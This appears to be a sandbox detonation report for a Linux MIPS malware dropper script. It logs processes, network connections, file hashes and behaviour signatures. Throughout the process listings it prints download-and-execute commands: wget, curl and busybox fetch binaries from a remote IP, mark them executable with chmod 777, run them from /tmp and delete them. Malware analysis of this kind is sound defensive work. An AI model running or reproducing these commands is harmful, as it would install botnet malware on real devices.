[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/836-1-0xb6715000-0xb6726044-memory.dmp
memory/874-2-0xb6756000-0xb6767044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 02:02
Reported
2024-11-21 02:04
Platform
debian9-mipsbe-20240729-en
Max time kernel
61s
Max time network
63s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
Processes
/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh
[/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
